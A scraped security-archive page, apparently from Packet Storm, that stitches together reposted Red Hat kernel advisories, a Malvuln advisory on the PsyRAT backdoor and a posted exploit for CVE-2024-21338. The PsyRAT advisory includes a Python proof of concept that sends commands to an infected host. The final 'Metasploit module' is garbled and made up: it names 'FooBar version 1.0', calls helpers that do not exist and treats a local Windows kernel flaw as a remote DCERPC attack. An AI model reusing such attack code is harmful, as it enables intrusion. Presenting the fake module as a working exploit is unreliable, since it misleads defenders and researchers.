* kernel-rt: kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24015)

* kernel-rt: kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22758)

* kernel-rt: kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22080)

* kernel-rt: kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-22933)

* kernel-rt: kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24498)

* kernel-rt: kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19966)

* kernel-rt: kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26334)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-33631

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2133452  
https://bugzilla.redhat.com/show_bug.cgi?id=2252731  
https://bugzilla.redhat.com/show_bug.cgi?id=2255498  
https://bugzilla.redhat.com/show_bug.cgi?id=2258518  
https://bugzilla.redhat.com/show_bug.cgi?id=2259866  
https://bugzilla.redhat.com/show_bug.cgi?id=2261976  
https://bugzilla.redhat.com/show_bug.cgi?id=2262126

Red Hat Security Advisory 2024-1614-03

Red Hat Security Advisory 2024-1607-03 - An update for kernel is now available for Red Hat Enterprise Linux 8. Issues addressed include code execution, null pointer, privilege escalation, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1607.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security, bug fix, and enhancement update  
Advisory ID:        RHSA-2024:1607-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1607  
Issue date:         2024-04-02  
Revision:           03  
CVE Names:          CVE-2021-33631  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)

* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)

* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (CVE-2024-0565)

* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)

* kernel: ext4: kernel bug in ext4_write_inline_data_end() (CVE-2021-33631)

* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)

Bug Fix(es):

* OCP 4.12 crashed due to use-after-free in libceph in rhel8 (JIRA:RHEL-21394)

* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (JIRA:RHEL-24010)

* Screen floods with random colour suggesting something not initialised (JIRA:RHEL-21055)

* kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (JIRA:RHEL-22766)

* tx-checksumming required for accessing port in OpenShift for RHEL 8.6 (JIRA:RHEL-20822)

* kernel: CIFS Filesystem Decryption Improper Input Validation Remote Code Execution Vulnerability in function receive_encrypted_standard of client (JIRA:RHEL-22077)

* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (JIRA:RHEL-22930)

* rbd: don't move requests to the running list on errors [8.x] (JIRA:RHEL-24204)

* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (JIRA:RHEL-24479)

* ceph: several cap and snap fixes (JIRA:RHEL-20909)

* [RHVH] Migration hangs between RHVH release bellow 4.5.1 and RHVH over or equal 4.5.2 release (JIRA:RHEL-23063)

* unable to access smsc95xx based interface unless you start outgoing traffic.  (JIRA:RHEL-25719)

* [RHEL8] ] BUG bio-696 (Not tainted): Poison overwritten  (JIRA:RHEL-26101)

* kernel: GSM multiplexing race condition leads to privilege escalation (JIRA:RHEL-19954)

* backport smartpqi: fix disable_managed_interrupts (JIRA:RHEL-26139)

* kernel: ext4: kernel bug in ext4_write_inline_data_end() (JIRA:RHEL-26331)

* ceph: always check dir caps asynchronously (JIRA:RHEL-27496)

Enhancement(s):

* [IBM 8.10 FEAT] Upgrade the qeth driver to latest from upstream, e.g. kernel 6.4 (JIRA:RHEL-25811)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-33631

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2133452  
https://bugzilla.redhat.com/show_bug.cgi?id=2252731  
https://bugzilla.redhat.com/show_bug.cgi?id=2255498  
https://bugzilla.redhat.com/show_bug.cgi?id=2258518  
https://bugzilla.redhat.com/show_bug.cgi?id=2259866  
https://bugzilla.redhat.com/show_bug.cgi?id=2261976  
https://bugzilla.redhat.com/show_bug.cgi?id=2262126

Red Hat Security Advisory 2024-1607-03

The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/0e6e40aad3e8d46e3c0c26ccc6ab94b3.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Agent.ju (PSYRAT)Vulnerability: Authentication Bypass RCEFamily: PSYRATType: PE32MD5: 0e6e40aad3e8d46e3c0c26ccc6ab94b3Vuln ID: MVID-2024-0677Disclosure: 04/01/2024Description: The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor. The malware will return a BADPWD and or "Invalid command" error string but the command executes regardless. Custom client is required as it seems to dislike CRLF \r\n characters when using netcat or telnet.getdrives C\ - Fixed Drive^D\ - CD-ROM^cpuinfo Windows Version |System Directory C\WINDOWS\system32|Computer Name DESKTOP-2C4IQJO|Username VICTIM|CPU Speed 2808 MHz|CPU Type GenuineIntel|------|PsyRAT Version PsyRAT 1.02|IP/Port 192.168.18.130|Password |Install name |Reg value |PHP URLexe_sho [Program_Name] starts a program Exploit/PoC:from socket import *MALWARE_HOST="x.x.x.x"PORT=55116s=socket(AF_INET, SOCK_STREAM)s.connect((MALWARE_HOST, PORT))#send bad passwordPAYLOAD="malvuln" s.send(PAYLOAD.encode())#call commandsPAYLOAD="exe_sho calc" s.send(PAYLOAD.encode())s.close()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.ju (PSYRAT) MVID-2024-0677 Bypass / Command Execution

Microsoft Windows version 10.0.17763.5458 kernel IOCTL privilege escalation exploit.

    ############################################## Exploit Title :  EXPLOIT Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control Vulnerability CVE-2024-21338 ### This module requires Metasploit: https://metasploit.com/download## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Security Risk : High ## ## ############################################## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote  Rank = NormalRanking   include Msf::Exploit::Remote::DCERPC  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact   def initialize(info = {})    super(      update_info(        info,        'Name' => 'CVE-2024-21338 Exploit',        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',        'Author' => 'You',        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2024-21338']        ]      )    )     register_options(      [        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),        OptPort.new('RPORT', [true, 'The target port', 1234])      ]    )  end   def check    connect     begin      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')    rescue Rex::Post::Meterpreter::RequestError      return Exploit::CheckCode::Safe    end     Exploit::CheckCode::Appears  end   def exploit    connect     begin      impacket_artifact(        dcerpc_binding('ncacn_ip_tcp'),        'FooBar',        datastore['FooBarPayload']      )    rescue Rex::Post::Meterpreter::RequestError      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'    end     handler    disconnect  endend  #refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338

Tag

#rce